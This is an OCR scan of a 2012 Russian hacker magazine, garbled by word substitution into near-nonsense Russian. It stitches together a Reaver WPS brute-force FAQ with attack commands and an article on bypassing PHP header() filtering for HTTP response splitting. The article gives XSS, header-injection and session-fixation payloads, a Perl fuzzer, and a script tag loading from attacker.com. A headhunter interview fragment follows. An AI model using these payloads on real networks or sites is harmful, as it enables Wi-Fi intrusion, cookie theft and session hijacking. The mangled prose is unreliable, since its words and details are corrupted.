безвыгодный надейся , почто

получится разломить по сию пору пойманные точки

Есть нераздельно тягостный ба г во Reaveг версии

доступа .

0.3,

по причине которого малограмотный определяются снятия

подобных блокировок . В качестве варюра­ Почему у меня безграмотный работает спуфинг

унда предлагают эксплуатнуть опцию

a.l

МАС-адреса?

· --ignoгe-locks' либо скачать последнюю

Почему близ плохом сигнале Reaveг

...

Возможно, твоя милость спуфишь МАС виртуально-

версию с

работает плохо, ежели и оный а хакинг WEP

081

го интерфейса mопО, а сие корпеть

WP5.

проходит нормально?

неграмотный будет. Надо выделять титул реального

n в большинстве случаев хакинг

интерфейса, например, wlaпO .

WEP происходит путем повторной пересылки перехваченных

081

Это происходит потому, что-то пиксел

r;t

для миг не допустить пользование

0':'1 a.l

Почему ваш покорный слуга неумолчно получаю ошибки

a.l

0VN.

mМожно ли вместе от тем пустить два и паче экземпляров Reaveг чтобы ускорения

атаки?

n

Теоретически МОЖНО, НО если бы ОНИ будут

батман кетов, с намерением извлечь более векторов

Reaveг однако момент посылает точке доступа

инициализации (IVI, необходимых к

единственный да оный а

успешного взлома . В этом случае неважно,

Проверь, активирован ли бери раутере

скоростьперебораедвалиувеличится,таккак

потерялея какой-либо пакет, либо некогда

WP5. Это

во данном случае симпатия ограничивается слабым

ПРОКАЧИВАЕМ В

PIN,

позволительно произвести рядом помощи ути-

строчить одну равно ту но точку доступа, в таком случае

REAVER

ты да я показали самый аляповатый равным образом в особенности многосторонний

HOWTO

081

во нежели дело?

порядок использования утилиты Reaveг. Однако отпуск

WP5 у

разных

0. Некоторые точки доступа

могут помешать

WPS нате

определенное

эпоха , заподозрив, который их пытаются поиметь. Reaveг эту ситуацию замечает

производителей отличается, почему во некоторы х случаях необходима

равно делает паузу на переборе бери

дополнительная настройка. Ниже автор приведу дополнительные опции,

паузы позволено менять:

015

секунд согласно умолчанию, затянутость этой

которые могут приподнять бойкость равным образом продуктивность перебора ключа.

# reaver -i

0. Можно где раки зимуют факс

канала да

# reaver -i

00 : 01:02:03:04:05

0. mопВ

mопВ -Ь

00:01:02:03:04:05 --lock-delay=25B

0510 точки доступа: -с

01

-е liпksys

Некоторые реализации протокола

WPS

разрывают конкатенация возле

неправильном РIN-коде, даже если объединение спецификации должны возвращать особое сообщение . Reaveг непроизвольно распознает такую ситуацию, интересах сего

0.

Благотворно сказывается получи скорости брутфорса опция

·-- dh-small',

существует опция · --пасk' :

которая задает небольшое спица в колеснице секретного ключа, тем самым облегчая

# reaver -i

выкладки возьми стороне точки доступа:

# reaver -i

mопВ -Ь

00:01:02:03:04:05 -vv --dh-small

0. Опция

mопВ -Ь

00:01:02:03:04:05

--пасk

' --eap-teгmiпate' предназначена про работы вместе с теми АР, которые

требуют завершения WРS-сессии со через сведения ЕАР

0. Таймаут ожидания

необходимости его допускается изменить:

# reaver -i

# reaver -i

0. Возникновение

mопВ

FAIL:

ответа за умолчанию равен пяти секундам . При

00 : 01:02:03:04:05 -t 0

mопВ -Ь

00:01:02:03:04:05

--eap-termiпate

ошибок на WР5-сессии может означать, в чем дело? АР

ограничивает численность попыток ввода РIN-кода, либо не мудрствуя лукаво перегружена

0. Задержка

в ряду попытками в области умолчанию равна одной секунде. Она

# reaver -i

ХАКЕР

mопВ -Ь

03 /158/ 00 02

00:01:02:03:04:05 -d

запросами . В этом случае Reaveг приостанавливает свою деятельность,

вдобавок промежуток времени паузы может являться задано вместе с через опции

т акже может взяться настроена: В

# reaver -i

mопВ -Ь

·--fail-wait':

00:01:02:03:04:05 --fail-wait=360

023


COVERSTORY &lt;script&gt;alert(&quot;Recognize-Security &quot; +document .cookie ); &lt;/script&gt;&lt; !-- "></ head ><body></body></html >

DISCLAIMER

Вообще, во п роцессе аудита начально г в рассуждении стих веб-приложений

бери РНР зачастую попадаются конструкции вида

header( "Location: " .$_GET[ 'backto_url' ]) иначе говоря ажно header( "Location: / index. php?lang=".$_G ET[ 'lang' ]). Е сли первую пока что допускается классифициро­

ZeгoNights, а чуть написана в области его мотивам. Помимо материала,

вать даже если бы как бы уяз вимость класса О реп R ediгect, ведь вторая что-то

дальнейших исследований, посвященных филырации РНР­

бы по отношению ко всему далеко не является уязвимостью . Опытный посетитель заметит,

функций равно механизмам работы браузеров от

чт по части на этом месте на явном виде в качестве кого однажды таки да присутствует ба г будто НТТР

доклада, касающаяся уязви мастей, связанных вместе с заражением

Response Sp li tti ng, %0 d%0a

изложенного нет слов миг доклада, во статью вдобавок вошло оnисание .

cookies. Часть

кеш а, равным образом smuggling-aтaк, хорошенького понемножку изложена во расширенном виде

н касательно всё профессия на том, ч т по части современные версии

интерпретатора РНР [начиная из 0006-го года] фильтруют раздели­ тели

Эта пункт неграмотный является копией мои доклада нате конференции

на следующих выпусках журнала.

да препятствуют проведению атаки. Вот сие равным образом снедать та

самая практическая предпосылка, которая заставила меня вчинить

углубленное исследование данной темы. Поэтом у предлагаю невыгодный вверяться

эти РНР

первому впечатлению в рассуждении фильтрации на функции headeг[] равным образом разо­

которая предотвращает ввод заголовков да защищает через атак

схватываться со проблемой глубже, ведь, существовать может, т акую фильтрацию

будто «расщепление ответа>>. Таким образом, начиная со во ерсии РНР

0.4.2

позволяется обойти.

равно

0.4.2

0.1.2,

равным образом

0.1.2

во этой функции осуществляется фильтрация,

пригнанный дальше шифр н е является уязвимым на атак

в виде <<в недр ение заголовков>> равно <<расщепление ответа>>:

ПРОТОКОЛ НТТР Обратимся ко переаисточнику [спецификации протокола НТТР] , что­ бы понять, какие символы могут прислуживать разделителями заголов­

засада НТТР- ответа. П олный формулировка спецификации доступен согласно адресу

Ьit .l y/ г9pLL , нас но интересует раздел

0 - Re sponse

c ?php header( "Location : / basic/ " .$_GET[ 'redirect ' ] . ".html" ); ?>

[ Ьi t .ly/BEAq4 ].

Общая устройство НТТР- ответа имеет нижеперечисленный обличье :

В результате попытки проведения таких атак короче вызвана ошибка будто Waгniпg, к примеру такая:

RFC-2616 Response=Status-Line; Section 0.1 * (( general-header; Section 0.5 1 response-header; Section 0.2 1 entity-header ) CRLF); Section 0.1 CRLF [ message-body ]; Section 0.2

Документация

test.php?xxx=bbb%0a%0dNew-Header:ЫaЬla

Warning: Header may not contain more than а single header, new line detected. in test.php оп line 0 Н об давайте далеко не будем махом навешивать ярлыки, а разберемся в проблеме символически глубже. Рассмотрим адрес интерпретатора, некоторый

Из приведенной ранее информации ясно, что-то разделителем заголо вк ов является вывод

CRLF,

пользуется к что касается тд еления тела отве т а насчёт т блока заголовков . В кодированном виде

CR LF

выглядит как бы

выполняет фильтрацию разделителя :

которая и ис­

%0 D%0A.

URL-

Именно на таком

виде симпатия равным образом используется пользу кого проведения классических атак будто

«рас щепление запроса». Эти методы недурно работали поперед тех пор, пока интерпретаторы далеко не обзавелись функциями фильтрации

CRLF,

/* new line safety check */ char *s=header_line, * е=header_line + header_line_ len, * р; while (s < е && (р memchr(s, ' \n' , (е - s)))) { i f ( *(р + 0 )== ' 01 *( р + 0 )=='\t ' ) {

относительно ко т орых не откладывая равно пойдет речь.

0=

р

+ 0;

continue ; ФИЛЬТРАЦИЯ РАЗДЕЛИТЕЛЯ

CRLF

В РНР

Ф ункци пишущий эти строки headeг[] [ Ьit .l y/wVbbcd ] барином используется во РНР пользу кого

efree(header_line ); sapi_module.sapi_error(E_WARNING, "Header may not contain more than а single header, new line detected. "); return FAILURE;

передачи заголовков на НТТР -ответе сервера. Чаще итого ее при­

меняют в целях переадресации пользователей вместе с одной страницы веб­ приложения получи другую. Как заметно с документации, начиная вместе с на ер-

Browser Single

Second Content-Length header

data

header

schema

splltter byte

ln Refresh header

Как видно, тогда осуществляе т ся осмотр возьми реальность символа

LF

[в URL-кодированном виде выглядит равно как % Од] . Пр равным образом обнаруже­

нии такого символа, затем которого игра стоит свеч как бы вдобавок табуля-

ции

[%09]

равно пр обела

фильтруется н е

[%20], вызывается ошибка. Таким образом, CRLF, а лишь только LF-байт. Согласно RFC , тот или иной автор сих строк

внове изучили, всё работае т безопасно. Н что до предл а гаю безвыгодный сда­ ваться беспричинно борзо да распознать у браузеров, соблюдаю т ли они

RFC

на точности? П ервым делом не запрещается проверить, на правах браузеры воспри­ нимают заглавие из первым пробелом да табуляцией. Для сего на­ пишем прос т ой РНР-скрипт да проверим его перед на семи браузерам да :

Таблица тестирования браузеров получи и распишись погоды не делает разделитель, двучленный заrоловок длины и Refresh-зaroлoвoк

026

c?p hp header( "X-Test1:1 \ r \ n Set-cookie: is1=0K " ); header( "X -Test2 : 0\ r \ n\ tSet-cookie : is2=0K" ); echo "cscript >alert(document.cookie) </ script >" ; ?>

ХАКЕР

03/158/2012


Расщепляй равным образом властвуй

П олучается, всего только lпtегпеt Е хрlогег понимае т куки на таких хидерах. Таким образом, всего-навсего прочитав

RFC

равно просмо т слезы

исходник равным образом РН Р равным образом три строки т естово г касательно кода, наша сестра поуже выяс н или, как бы

огибать филырацию функции headeг[J интересах

IE, да вопрос жизни и смерти рас­

ширили сторона применения большинства уязвимостей, которые

~

*

0

Веб

localhost:8080/php·smug/index2.php

Warning: Header may not contain more than \indexl.pbp on line 0

а

single header, oe\v line detected. in

'1

до тех пор классифи ц иро во алис ь т по отношению л ько во вкусе О реп Rediгect. Н что до небу­ дем замяться бери дости г нутом равным образом двинемся дальше. Впереди другие браузеf)Ы равным образом новые идеи.

Работа фильтра функции headeгll во РНР вместе с 0006 возраст вызываетта кую ошиб ко у

+ Д а, ч т ение последствие н ых кодов РНР равно рассуж д ение со точки зрения

здравой логики уж дало со во ои п ло д ы. Мы нашли сnособ внедрения заголовков на браузера lпteгnet Е хрlогег. Пре д лагаю безвыгодный останав­

*0

~

Веб

localhost8080/ php·smug/index2.php

Warning : Cookie names can not contain any ofthe foJlo,ving '=,; \t\r\n\013\014' in \indexl.pbp on line 0

'1

ливаться держи достиг н у т ом равно n р касательно д олжить начатое исс л едование, что­

бы рисковать доби т ься того а равно для того д ругих браузеров.

Итак, исходники Р Н Р чу что до филырации % 0а [\nили LFI.

Рабо та ф равно льтр а фун ко ци равным образом setcookiell до первому аргумен ту

Предnоложим, который сущес т вую т какие-то бай т ы, которые могут ~

служи т ь присест д елителями заго л овков интересах браузеров. Д л мы nроверки этого предположения напишем безыскуственный фаззер да запустим его подина

различными браузерам и. Н аиболее важные куски заключение фаззера

*0

nри на е д ены внизу :

'1

#! / usr / bin / perl use str i ct ; use warni ng s; use Socket ;

Веб

loca lhost8080/ php·smug/ index2.php

Warning: Cookie values can not contain any ofthe foJlowing ',; \t\r\n\013\0 04' in \indexl.pbp on line 0

Работа фильтр а функци равным образом setcookiell в области второму аргументу

н улл-байт. Информацию об этой уязвимости пишущий эти строки отправил произво­

дителю. Ей был присвое н штучка 05992 да ватерпас отметка Low [это не позволило ми унаследовать плата из-за ее обнаружение,

listen SERVER , 0е ; $an sw="НТТР/1.1 0ее OK\r\n" ; for ($ i=e ; $i <256;$i++ ){ $an sw.="Set-cookie: cook-$i=1" .c hr($i);

что, на общем, по заслугам - сие фактически живей ба г, нежели уязвимость!.

ту

В итоге во 05-й версии Хрома нул л-байт сделано поправи л и, а ко моме нт у выхода этой статьи, подозреваю, актуальной склифосовский уж 07-я версия бра у зера. F i гefox а остается держи высоте, nоскольку реализован в этой части как часы так, во вкусе описано на

$answ .="\r\n\r\n<h1>Test splitting bytes</h1>" ;

RFC. Следовательно,

ни сам согласно себе

изо найденных нами способов обхода филыров Р Н Р в целях него рабо­ тать малограмотный будет. Фаззер архи простой: от его через автор сих строк выясняем, может

ли какой-т что касается безраздельно байт [под ч ерки на аю, то-то и есть единичный байт,

РАСЩЕПЛЯЕМ ОТВЕТ И ПРОВОДИМ

XSS

а далеко не д ублет! служит ь раздели т елем заголовков на браузерах, в качестве кого

Настало период прибегнуть найденными на фильтре ошибка­

CR LF [%0d%Dal. Д ля э т что до г по отношению бери сокетах nишем веб - микросервер,

ми равно nроэксnлуатировать уязвимости функции headeг[J, в таком случае очищать

ко т орый в произвольный НТТ Р-за п рос браузера дает относительно т вет, со д ержащий

проложить безвыгодный посредственную атаку. Здесь пред нами встает

х идеры

Set-cookie,

разделенные каждым с

056

байт по мнению очереди.

Соот во етственно, ежели какой-то байт срабатывает как бы разделитель,

новая дело - самочки браузеры имеют замонтированный механизм защиты ото расщепления ответа . Вот как бы мудрено в сущности

поя на ляетс ваш покорнейший слуга новоиспеченный кукис, кабы а невыгодный срабатывает, так ко значению

иным часом выжимать весь пот вместе с l iепt - sidе-уязвимости: раньше борешь­

текущего кукисадописывается черта ви д а

ся от фильтрами для серверной стороне, а в дальнейшем бьешься снова равным образом из

<«N>Set-cookie :.. >> . За­

пускаем скрипт, заходим со через браузера, считаем количество проставленн ы х куки, смотрим, какие байты от р аботали, дальше nро ­

клиентскими.

Итак, расщепывание отве т а глав н ым образом основано получи и распишись пере­

буем нижеперечисленный браузер. П роцедура безграмотный бог у т омительная, эдак

даче ложного заголовка Content-Leпgth, тот или другой в долгу болтать

наравне интересах тестов наш брат берем только лишь самые популярные браузеры, кото­

браузеру, насколько байтов содержится на теле НТТР-ответа. Однако

рых лишь п ваш покорнейший слуга т ь

:-1. Тем

безграмотный менее, рекоме нд ую т ебе самос т оятельно

п ри вызове headeг[J самовольно Р НР отправляет насчёт д ан форточка Coпtent­

переменять фаззер пусть бы бы чтобы автоматизации подсчета куки

Leпgth со значением О, ото сего никуда безграмотный деться. Таким образом,

да поиска разделителей [исходники фаззера ищи сверху нашем диске!.

античный НТТР Response Splitting [расщеnление НТТР-ответаl

Получаются вона такие да н тересные резул ьтаты:

работает всего только тогда, в отдельных случаях браузеры воспринимаю т второстепенный за­ головок

Content-Length

на правах заправду верный. Здесь да начинаются

проблемы, так как ни единодержавно остросовременный браузер таково неграмотный де­

0/9 %ed Fi r efo x 0 Oper a %ed Chrome %ed %ее ( Is s ue 05992 fi xed i n re l . 05) Safa r i %ed н

лает. Тем малограмотный менее, дозволяется nровести атаку чтобы lnteгnet Е хрlогег, воспользовавшись т ем, что-нибудь оный браузер расnознает Н Т МL-код во от­ вете, ажно безвыгодный читая хидер

Content-Length.

Это побольше нежели странное

nоведение имеет поле во браузере со 0-й согласно 0 - ю версию . П ишем уязвимый Р НР -сценарий:

Как видно, целое браузеры, за исключением F iгefox, воспринимают оди­ ночный

CR

т очно круглым счетом же, наравне да всю преемственность

CR LF.

Вот э т в рассуждении поуже настоя щ ий резул ьтат, тем более д аря ко т орому можно н е лишь только шея во равно т ь уязвимость, хотя равным образом проделать атаки получай ее основе

<?php header( "X-Header: aaa" .$_GET ( 'r' ] ); ?>

фундаментально кросс-браузернымиl Отмечу, что, в отдельных случаях ваш покорный слуга начинал эти с ы ска н ия, ак т уальной была 04-я трансформация

Goog le C h гome,

дл ваш покорнейший слуга

для оторой и существовал другой байт-разделитеть -

Х АКЕР ОЗ/15 0/ 0 01 0

Затем n рово д им атаку nод l nteгnet Е хрlогег посре д ством вот такого НТ ТР -заnроса :

027


COVERSTORY обсудили. Еще нераздельно IЕ'шный заголовок, X-Content-Type-Options, ·

/index.php?r=foobar%ed<html>%ed<hl> TEST </h l >

предоставляю тебе сломать самостоятельно. Остальные заголов ­ ки к управления безопасностью поддерживаются всеми браузе­

Вывод сего со углубление твоя милость сможешь испить возьми соответствую­

щем скриншоте. На ранний взгляд, всё ранее хорошо. Однако нас

рам да . Однако запомни равно как аксиому следующее утверждение: заго ­

ловки перезаписываются [за исключением Content-Length). Таким

блокирует замонтированный на браузер ХSS-фильтр, когда-никогда да мы из тобой пробуем

образом, header( "Location:

ввести воттакой изложение :

дает полноценную ранимость Open Rediгect около эксплуатации

/index .php?r=foobar%ed<html>%ed<script > alert(/Splitting/)</script>

хотите- верьте, хотите- проверьте. Сейчас автор этих строк малограмотный буду nеречислять

/index.php?lang=" .$_GET[ 'lang' ])

вектора ?lang=aaa % 0dlocation:http://yandex.гu. Как говорится, все возможные заголовки lпрочитать относительно них твоя милость сможешь держи соответ­ ствующей врезке), а остановлюсь только получай самых значимых. Итак, Access-Contгoi-AIIow-Oгigin- сие вслед за мяч овок, кой

Пройти такого типа дорога да малограмотный произвести желаемого результата, упер­ шись на какой-то затем фильтр,- сие отнюдь не в целях нас. Вспоминаем, что-нибудь наш брат

работает nочти nод всеми браузерам и, за вычетом Орега, во книга числе

можем малограмотный лишь только заворачивать веточка ответа сервера, однако да вводить

лещадь lnteгnet Ехрlогег 0+, Fiгefox 0.5+, Safaгi 0+ равно Google Chгome. Для

заголовки. К тому но ХSS - фильтр lпtегпеt Ехрlогег, вопреки в в таком случае

начатки советую составить себя понятие не без; первоисточником lmzl.la/4sгnwml.

что такое? возлюбленный чрезвычайно прибавил во сигнатурах до сравнению из 0-й версией

Как видно, текущий название дозволительно пускать в дело от дополнительными

браузера, всё таково же, в качестве кого да раньше, отключается со через специ­

следовать мяч что касается во ка ми Access-Contгoi-AIIow- Methods,

ального заголовка X-XSS-Pгotectioп: О. Ну вот, заключительный кусочек пазла встал нате место, равно в настоящее время не грех сопровождать полноценную

Headeгs, Access-Contгoi-Max-Age равным образом некоторыми другими [снова обрати подчеркнуть что получи приведенную меньше ссылку ). Назн аче ни е сих

атаку.

заголовков, думаю, наглядно с их названий. Access-Contгoi - AIIow­

Финальный НТТР-запрос для уязвимому сценарию имеет следую­

Access - Contгoi-AIIow­

Oгigin не грех исnользовать в духе чтобы усиления, круглым счетом равным образом на ослабления безоnасности . Всё труд на том, что такое? разве оный наименование безграмотный содер ­

щий вид:

жится на ответе, пришедшем ото сервера, ведь теледоступ от XHR ко со­

/index2 .php?r=foobar%edx-xss-Protection:e%ed<html>%ed <script >a lert( /xss/)</script>

держимому тела такого ответа запрещен. Таким образом, наш брат можем внедрить аншлаг «Access-Contгoi-AI I ow-O гigin : •" равно nрочитать полный отклик со всеми конфиденциальными д анными.

ЧЕРЕЗ ТЕРНИИ К ЗВЕЗДАМ Мы начали со чтения RFC, дальше заглянули вовнутрь РНР, в дальнейшем плав­

ОСМАТРИВАЕМСЯ

только перешли для изучению механизмов, применяемых браузерам да про

Итак, ты да я нашли определенные уязвимости функции headeгll. На­

обработки ответа, да вот, наконец, получили важные результаты.

следственно минута узнать, существуют ли какие-нибудь часть функции,

Мы разобрались не без; lntегпег Е хрlогег равным образом рассмотрели сеяние за­

выnолняющие аналогичную фильтрацию. Собственно, во РНР име­

головков на НТТР -о тв ет. Сам рецепт неграмотный является частным случаем

ется лишь три функции, которые занимаются относительно тправ какой заголов­

расщепления ответа, круглым счетом на правах близ его использовании появляется

ков: headeгll, setcookiell равным образом setгawcookiell. В результате недолгого

всего только остающийся заголовок, а невыгодный вторичное апотеций ответа. А кабы пишущий сии строки

изучения легко и просто выясняется, почто двум последние функции, приближенно а

малограмотный внедряем клейстокарпий ответа, в таком случае равно проблем не без; Conteпt-Length у нас в свою очередь

на правах да headeгll, уязвимы на аргументах $path равно $domain . Уязвимые

невыгодный будет, ведь, в согласии RFC, учет НТТР деньги неграмотный регулирует

доводы есть, а их изменение пользователем на Приложениях

число заголовков . Теn ерь предлагаю nойти ужотко равно nристу­

встречаетс автор конец редко. Обычно ото nользовательских nара­

вдрызг ко изучению др угих потенциально внедряемых заголовков, тем

метров зависит всего-навсего фамилия не так — не то зна чени е куки, только хоть твоя милость зачем хочешь отнюдь не землевладение

сильнее аюшки? наш брат покамест неграмотный выяснили, в качестве кого протягивать атаку подо остальны­

да отнюдь не линия . Поэтому изыскание должно удлинить . В имени и значениикукивыполняется значительно больше строгая фильтрация,

ми браузерам и.

нежели на функции headeгll:

ВНЕДРЯЕМ ЗАГОЛОВКИ Как еще было отмече н касательно выше, заголовки малограмотный влияют сверху Content-

Length, а значи т, их дозволено насадить на НТТР- отклик с целью любых браузеров. В нынешнее промежуток времени существует н емало заголовков для управления безопасностью, единолично изо которых, X-XSS-Pгotection, управляющий встроенным ХSS-фильтром l nteгnet Ехрlогег, автор сейчас

i f (name && strpbrk(name, "=,; \t\r\n\el3\el4" ) !=NULL) { !* man isspace for \ еlЗ and \ el4 */ zeпd_error( E_WARNING, "Cookie names сопение not coпtain any of the followiпg'=,; \\t\\r\\n\\el3\\el4' " );

ЗАГОЛОВКИ УПРАВЛЕНИЯ БЕЗОПАСНОСТЬЮ 1. X-Frame-Options. Содержит каталог доменов,

Coпteпt-Security-Policy : allow http://*:80.

идентификатор сессии, а впоследствии легко

из которых настоящий сайт может присутствовать загружен

З.

подождать, сей поры юзер авторизуется,

на ifгаmе/fгаmе-контейнер . Для проведения атаки не запрещается пустить в ход X-Frame-Optioпs : allow-fгom

attacker. 2. X-Content-Security-Policy.

Refresh . Старый добродушный Refгesh . Дает внедрение HTML подле использовании dаtа­ схемы либо Open-гedirect : Refresh : 0,data:text/ html,<h1>0K</h1>. В таком содержимом Chгome

равно пускать в ход текущий маргиналия для того вторичной

аутентификации. Вектор может выглядеть примерно следующим образом: foobaг :% 0d5et­

меню доменов, от которых разрешено

прогноз выполняется безграмотный на целевом домене ,

Cо об k i е: Р Н Р5 Е 051 D=FA К Е D%0d Locat ion=/ auth.php. Разумеется, такая схематическое изображение хорош

погрузка содержимого . Скажем, когда сервер

а во праздник самой data-c x eмe, что-то далеко не позволяет

коптеть только лишь во книга случае, ежели веб­

устанавливает во ответе X-Content-Secuгity­

злоумышленнику утвердить

применение потом авторизации неграмотный отправляет

Policy : allow 'self', в таком случае адрес <script src="http://at-

0. Set-cookie. Его ваш покорный слуга привожу после этого

tackeг.com/1.js"><scгipt> корпеть для странице

до невозможности про полноты. Используя

На практике

малограмотный будет. Таким образом, во значении к

оный заголовок, позволено назначить рано

в целях 0ession Fixatioп !именно что-то около называется

проведения атаки ничего не поделаешь адресовать Х-

в готовности lто питаться общеизвестный злоумышленнику!

сия атака!.

028

Содержит

фильтрует scгipt . Но, вроде бы после ни было,

XSS.

пользователю последний идентификатор сессии .

09% РНР-приложений уязвимы

ХАКЕР

03/158/2012


Расщепляй равным образом властвуй

01[~ .tf] http://t~stcom:8080/php·smug/i ndexl.php?rsfoobar%0d <html > %0 Р

х

Find: j9

0

Conten t-Lenиth:

PI'N~ous Nежт.

0

0

..

С, Х ' ~ testcom

Options .. 0

0 Keep-Alive: timc:ou\-5, max"" IOO Connecrion: Keep-Ative Content-Type: textlhtml

TEST Content·Lengtb: 0 Keep-Alive: timeout=5, ma:-;;=1 00 Connectioп : Keep-Alive Content-Typc: textlhtml

IE распознает НТМL-содержимое ажно

под Coпteпt-Length, так принимать торчмя на заголовках

return FAILURE ; }

if ( !u rl_encode && value && strpbrk(value, ",; \t\r\n\013\814" ) !=NULL) { /* man isspace for \ 013 and \ 014 */ zend_error( E_WARNING, "Cookie values сопение not contain any of the following',; \\t\\r\\n\\813\\814'" ); return FAILURE;

0 lnternet

Eжplorer has mod ified this page to Mlp prevent cross·site кripting.

Срабатывание ХSS-фильтра на

IE

chrome 0896 safari 0891-LEN(cookie_name) opera 0896 firefox 0896 iexplore 0116- LEN (cookie_name) ПЕРЕЗАПИСЬ КУКИ ПРИ ПЕРЕПОЛНЕНИИ ЧИСЛА Как всегда, полегче обначить вместе с чтения

RFC: www.ietf.oгg/гfc!rfc2109.txt . RFC пристало убедить сверху фразу << at least 20 cookies рег unique host ог domain name». Здесь отнюдь не говорится четко, пристало ли браузерам оберегать 00 кукинахост alias 00 Особое почтение во этом

} Функция stгpbгkll возвращает ложь, неравно на первом аргументе присутствует хоть бы сам байт изо второго аргумента. Как видно,

куки получи и распишись домен. Пусть самочки решают. Видимо, на 0997 - м г оду сие

фильтрование именикукиотличается ото фильтрации значения только лишь

казалось нормальным, же сейчас, если существую т чудовища

одним байтом- символом равенства. Прежде только ми захотелось

не без; сотней поддоменов, настоящий проблема больше нежели актуале н.

разобрать функцию фильтрации. Она является полным аналогом

Итак, от случая к случаю аз многогрешный прочитал оный

RFC,

в таком случае принялся отыскивать настройки,

!вернее, прототипом] РНР'шной stгpbгk l php.su/fuпctioпs/?stгpbrk ] ,

определяющие максимальное контингент для у ки во брауэерах, равным образом про­

которая оказалась небинарно совместимой . Казалось, зто победа,

верять, распространяются ли сии настройки получай nоддомены . Вот зачем

да безвыгодный тут-то было! Дело во том, ась? самоё встроенная на РНР занятие

половая принадлежность у чилось:

передачи ответа ото сервера такженебинарно совместима, так убирать

нулл-байт обрывает от тр оку наравне однова на томик месте, идеже да мы со тобой могли бы провести инвагинация заголовка или — или тела отве т а. В итоге канделябр у зер получает сделано укороченную сообразно нулл-байту строку. Дальше был фаззинг, беда сколько фаззинга . И никаких идей в рассуждении том, наравне обижать

фильтрацию, пусть бы во старых версиях РНР символ=не обрезается.

Новые версии никак не содержатуязвимости lя проверил их целое от

chrome 088 safari -2888/ LEN (cookie_na me+cookie_va l) opera 08 firefox 049 iexplore 09

0010

лета ] .

Как видно, сии значения далеко не равны

00,

так как-никак суще­

ственно в меньшей степени 00000 :-].Что касается поддоменов, так точка соприкосновения

ОСОБЕННОСТИ

COOKIES

числокукисохраняется исключительно в целях Орега да Chгome, оставшиеся

Фаззин г завсегда дает какой-то результат, пусть себя на здоровье ажно отнюдь не абсолютно тот,

ведут отсчеткукиотдельно в целях каждого поддомена . Ситуация

возьми что рассчитываешь изначально. Эксперименты со фильтра­

забавная, благодаря чего сколько дозволено скопытить куки вышестоящего домена

цией среди первых двух аргументов setcookiell равно setгawc o okiell

вместе с нижнего уровня . А позволяется ... Можно вызнать имена куки выше­

также принесли приманка плоды. Я выяснил забавные особенности об­

стоящего домена. РоС сего ба га про О ре га равным образом Chгome фактиче­

работки куки во браузерах равным образом хочу растрезвонить об сих особенностях

ски представляет с лица всеобъемлющий скоуп об гр аниченного числа куки.

на от т атье. Ведь уязвимости вторичны объединение сравнению от теми метода­

Что будет, в некоторых случаях со дальше из тоящего домена придет IN+1]-й кукис?

ми, из через которых они были найдены. Как гласит китайская

Он перезапишет како й -токукис изо скоупа. Правильно, а ка-

народная мудрость, отдашь свою рыбу- накормишь товарища

кой? Самый старый? Нет, на фолиант равным образом присутствие кол, почто симпатия выберет кукис

в день, научишь его обнаруживать рыбу- накормишь бери всю житьё-бытьё .

согласно кириллица у . Пахнет бинарным поиском? Да, прямо так! С по­

Но хва т ит лирики, перейдем напрямую ко результатам.

мощью этой дурь да мы не без; тобой можем выслеживать именакукивышестоящего домена от нижестоящего почти Орега равным образом Chгomel Н по отношению писат ь ко д подина

БЛОКИРУЮЩАЯ ДЛИНА ЗНАЧЕНИЯ КУКИ

эту задачу бермудно да неграмотный особенно нужно, тем безграмотный менее на реальной жизни

Если на качестве значения кукису отправить в большинстве случаев символов, нежели

значения куки куда-нибудь важнее, нежели их имена, которые, вроде правило,

поддерживает браузер, кукисне проставится. Я воспользовался

являются статическими. Итак, подведу итог. Оказывается, мож­

этой особенностью, нет-нет да и ми получай практике надлежит было до­

хотя уменьшать куки, когда снедать случай вписать бессчётно

противоборствовать того, с тем этакий гляди шифр никак не ставил куки :

своих. Иногда в целях одного домена, по временам как и для того п оддоменов

ICh гome, Орегаl.

<? php setcookie( "param8" , "PREFIX_" .$_GE T[ 'p8' ]);

leilii;Jel В окончание статьи ваш покорный слуга бы хотел созвать тебя nродолжить мое

?>

изыскание равным образом зачать свое, побольше современное равным образом интересное.

Для решения этой задачи необходимо

0096

символов . Предпо­

Надеюсь, ми посчастливилось отобразить неграмотный всего лишь соль различных ба го во

лагается, сколько лишняя пикет обрежется. Однако ни капельки всегда

как НТТР

браузер ы вместе никак не ставя т такие кукисыl Следовательно, кабы

ку да изучению. А разве нет- обещаю отрыть пора равно си лы , воеже

кукис сейчас существует, дьявол неграмотный п ерезапишется. Это жестко помогло близ

начертать новые статьи для того журнала. На целое воnросы

написании сплойта почти чувствительность как Sessioп Fixatioп. Вот такие

да далеко не всего не без; радостью отвечу на своем благе i oxod . гu ]. Сnасибо

данные блокирующей длины значениякукиполучаются почти

вслед за интерес да поперед новых встречl :Х:

Response Splitting,

однако равным образом изложить самовластно упрощенство для их п оис­

no

со т атье

разными браузерам и:

ХАКЕР

03/1 08/20 02

029


COVERSTORY

&ИОГРАФИЯ Окончиnафакультет

журналистики МГУ.

Работала редактором 01 главным редактором во раэnичных иэданиях. Участвовала во соэдании портаnа гabota.ru, вэявwего nремию Рунета.

запустила программа PaбoтalaMa\\.Ru. Зкс-хантер Ma\\.Ru Gгoup.

Основатель агентства интернет­ рекрутмига PRUFFI. один иэ ведущих экспертов рынка хантинга во рунете.


Интервью от вед ущим хедх антером рунета

ИНТЕРВЬЮ С ВЕДУЩИМ

АЛЕНА ВЛАДИ М И РСКАЯ

ХЕДХАНТЕРОМ РУНЕТА

О РАБОТЕ ХАНТЕРА

fгiends). Каждый с нас является носи­

Многие воспринимают хедхантеров как бы раз­

впредь до

0,5

миллионов рублей на месяц.

телем информации что касается тех людях, вместе с кото­

датчиков содержание во блокадном Ленинграде. Все

рыми работает. Именно вы, а малограмотный король тер

Раз на гетто автор сих строк делаем приманка обзоры,

думают, сколько когда водиться от нами да узнавать вол­

сnособны nравильно придать значение сих

идеже ставим реальные зарплаты (pгuffi.

шебный телефончик ведущего хантера во рунете,

людей. Вы работаете из ними и оный и другой

гu/analitika) . Цифры , которые да мы от тобой nри­

ведь зто в качестве кого дополн равно т ельная часть ка хлеба. Ты зна­

воскресенье равным образом верно можете сказать, кто такой лакомиться

водим, получи и распишись

ешь продавщицу, равно возлюбленная чаятельно во вкусе может наградить

кто: чисто этому товарищу заключая синь порох

тике через известных рекрутинговых nро­

тебе добавочный сухарик . Н в отношении для самом

не велено nоручать, а видишь нынешний достижимо

ектов. Почему? Объясню получай nримере .

деле никак не может. Боле е того, закачаешься эпоха блокады

упрямый чувак.

00-40%

Мы знаем, зачем nрограм­

следовать зто расстреливали . Знание сего волшебного

телефона, до сути, сносно безвыгодный дает.

